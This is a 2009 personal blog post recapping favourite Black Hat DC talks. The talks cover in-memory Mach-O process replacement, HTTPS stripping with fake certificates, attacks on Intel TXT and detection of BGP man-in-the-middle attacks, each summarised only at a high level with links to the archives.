Sunday, February 22, 2009

Some Brief BH DC Afterthoughts

Though it's almost too late for this, I thought I would write briefly on BH DC. I had a blast while I was there and there were some very interesting talks. In case you are interested in the content of these talks, slides, papers, demos and videos are being uploaded to this site:

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-archives.html

The talks I liked the most were:


Let Your Mach-0 Fly by Vincenzo Iozzo


This talk describes how to replace a running process in memory with another by unmapping the current process, replacing the header and enveloping the old process with the new process. It was really cool to see the demos, but if you watch the video (if it is uploaded), you will see he has trouble with the safari example. I didn't have time to confirm my suspicions, but I thought this is because he didn't supply the entire path to the desired executable. I came to him after the talk to ask about this, but things were so rushed at the end that I didn't get a chance to ask. I emailed him and he replied: ``I found the problem, I forgot to patch a known bug before my talk,'' so he seems to have found the problem. The code for this one is available online.

New Techniques for Defeating SSL/TLS by Moxie Marlinspike

I wasn't completely sure at first that this was going to be an interesting talk, but it turned out very nice. The title is misleading in that it wasn't really about SSL in general but about https specifically. He has a tool that can MITM connections by
stripping out references to https to http. While that is not as interesting, the more interesting part comes into play with the creation and usage of fake certificates to make things "secure". It was also funny how he used the favicon feature to make give a positive indicator by switching it with a padlock. I'm not sure how effective it would be against items like Yahoo!'s sign in seal (among others), but there are other interesting possibilities. The code for his presentation is also available online. (updated link)


Attacking Intel(R) Trusted Execution Technology by Joanna Rutkowska
and Rafal Wojtczuk


This was an awesome talk. It was a pleasure to see this team of famous researchers talk about the intense of TXT and how they could exploit it. The video for this one is up, it would definitely be worthwhile to watch it. The video for this one is available online. Joanna has also posted the videos from the slides here:
http://theinvisiblethings.blogspot.com/2009/02/attacking-intel-txt-paper-and-slides.html

Defending Against BGP Man-In-the-Middle Attacks by Earl Zmijewski

This was another awesome talk! I didn't know the fine details about routers before the talk, but the MITM attack is quite simple. It was also very interesting to see how they came to a solution for detecting these attacks. It was also interesting that there after they had refined their detection algorithm they only found three instances of the attack "in the wild", all of which could be explained. Another must read/watch I think, and Earl is entertaining :-)

No comments: